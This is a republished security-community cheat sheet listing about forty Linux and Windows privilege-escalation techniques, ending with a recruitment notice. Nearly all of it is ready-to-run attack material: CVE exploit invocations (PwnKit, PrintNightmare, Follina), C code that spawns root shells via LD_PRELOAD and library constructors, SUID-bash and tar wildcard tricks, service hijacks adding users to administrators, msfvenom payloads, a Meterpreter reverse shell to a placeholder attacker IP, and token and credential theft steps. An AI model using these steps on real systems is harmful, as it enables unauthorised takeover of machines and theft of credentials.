40 Privilege Escalation Methods
2023-05-12 22:08:43 Author: Z2O安全攻防 (view original) Views: 27

Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
Methods:
1. gcc -pthread c0w.c -o c0w; ./c0w; passwd; id

Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
Methods:
1. CVE-2016-1531.sh; id

Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
Methods:
1. https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
2. poc.sh

Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
Methods:
1. ./traitor-amd64 --exploit kernel:CVE-2022-0847
2. whoami; id

Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
Methods:
1. ./cve-2021-4034
2. whoami; id

Domain: No
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
msf exploit(ms14_058_track_popup_menu) > exploit

Domain: No
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1. In the command prompt type: powershell.exe -nop -ep bypass
2. In the PowerShell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In the PowerShell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
4. To confirm that the attack was successful, in the PowerShell prompt type: net localgroup administrators

Domain: No
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1. execute -H -f sysret.exe -a "-pid [pid]"

Domain: Yes
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1. https://github.com/outflanknl/PrintNightmare
2. PrintNightmare 10.10.10.10 exp.dll

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1. https://github.com/JohnHammond/msdt-follina
2. python3 follina.py -c "notepad"

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1. https://github.com/riparino/Task_Scheduler_ALPC

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1. sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user
2. .\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1. certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
2. Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
Methods:
1. python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

Domain: No
Local Admin: Yes
OS: Linux
Type: Injection
Methods:
1. ldreload.c:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
/* _init runs when the shared object is loaded via LD_PRELOAD */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
2. gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
3. sudo LD_PRELOAD=/tmp/ldreload.so apache2
4. id

Domain: No
Local Admin: Yes
OS: Linux
Type: Injection
Methods:
1. mkdir /home/user/.config
2. /home/user/.config/libcalc.c:
#include <stdio.h>
#include <stdlib.h>
/* constructor attribute: inject() runs automatically when the library is loaded */
static void inject() __attribute__((constructor));
void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
3. gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
4. /usr/local/bin/suid-so
5. id

Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1. RemoteDLLInjector64
   Or MemJect
   Or https://github.com/tomcarver16/BOF-DLL-Inject
2. #define PROCESS_NAME "csgo.exe"
   Or RemoteDLLInjector64.exe pid C:\runforpriv.dll
   Or mandllinjection ./runforpriv.dll pid

Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1. hollow svchost.exe pop.bin

Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
Methods:
1. sec-shinject PID /path/to/bin

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Scheduled Tasks
Methods:
1. echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh;
2. chmod +x systemupdate.sh
3. Wait a while
4. /tmp/bash -p
5. id && whoami

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Scheduled Tasks
Methods:
1. echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh;
2. touch /home/user/--checkpoint=1;
3. touch /home/user/--checkpoint-action=exec=sh\ systemupdate.sh
4. Wait a while
5. /tmp/bash -p
6. id && whoami

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
Methods:
1. su - www-data;
2. nginxed-root.sh /var/log/nginx/error.log;
3. As the root user: invoke-rc.d nginx rotate >/dev/null 2>&1

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
Methods:
1. echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c;
2. gcc /tmp/service.c -o /tmp/service;
3. export PATH=/tmp:$PATH;
4. /usr/local/bin/suid-env; id

Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
Methods:
1. env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. windows_dll.c: cmd.exe /k net localgroup administrators user /add
2. x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
3. sc stop dllsvc & sc start dllsvc

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. sc config daclsvc binpath= "net localgroup administrators user /add"
2. sc start daclsvc

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Place common.exe in 'C:\Program Files\Unquoted Path Service'.
3. sc start unquotedsvc

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
2. sc start regsvc

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
2. sc start filepermsvc

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. In Metasploit (msf > prompt) type: use multi/handler
   In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
   In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
   In Metasploit (msf > prompt) type: run
   Open an additional command prompt and type:
   msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
2. Place program.exe in 'C:\Program Files\Autorun Program'.

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
2. msiexec /quiet /qn /i C:\Temp\setup.msi
   Or SharpUp.exe AlwaysInstallElevated

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
2. !rmpriv

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. Conjure-LSASS
   Or syscall_enable_priv 20

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. injectEtwBypass pid

Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. PrimaryTokenTheft.exe pid
   Or TokenPlaye.exe --impersonate --pid pid

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. start /realtime SomeCpuIntensiveApp.exe

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. Simply compile and run SeManageVolumeAbuse

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. Requires WRITE_OWNER access to a resource, including files and folders.
2. Run it for privilege escalation

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with Enable-SeRestorePrivilege.
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
   In Metasploit (msf > prompt) type: set uripath x
   In Metasploit (msf > prompt) type: run
2. In Task Manager, right-click "iexplore.exe" in the "Image Name" column and select "Create Dump File" from the popup menu.
3. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
   Copy the Base64-encoded string.
   In the command prompt type: echo -ne [Base64 String] | base64 -d

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
2. TrustExec.exe -m exec -c "whoami /priv" -f

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. takeown.exe /f "%windir%\system32"
2. icacls.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. PSBits
   Or PrivFu
2. psexec.exe -i -s -d cmd.exe

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Methods:
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
   Or CredManBOF
2. TrustExec.exe -m exec -c "whoami /priv" -f

This article has also been compiled into Markdown notes for offline use and for reference during engagements; reply "20230512" to the official account to get them.

HVV recruitment

Recruiting for HVV 2023: many mid-to-senior blue team positions are still open! Participants can scan the QR code below to submit a resume, or add the WeChat account below and send "hvv" in a private message to be added to the HVV project group.


Source: http://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247496074&idx=1&sn=e6bb476dbc6eec2889a48fdf202a1c2d&chksm=ceab1acaf9dc93dc349de5ef52af6cff5dbb35bdeedc6e8578e90d906257f187eec99eb6e0c1#rd
For infringement concerns, contact: admin#unsafe.sh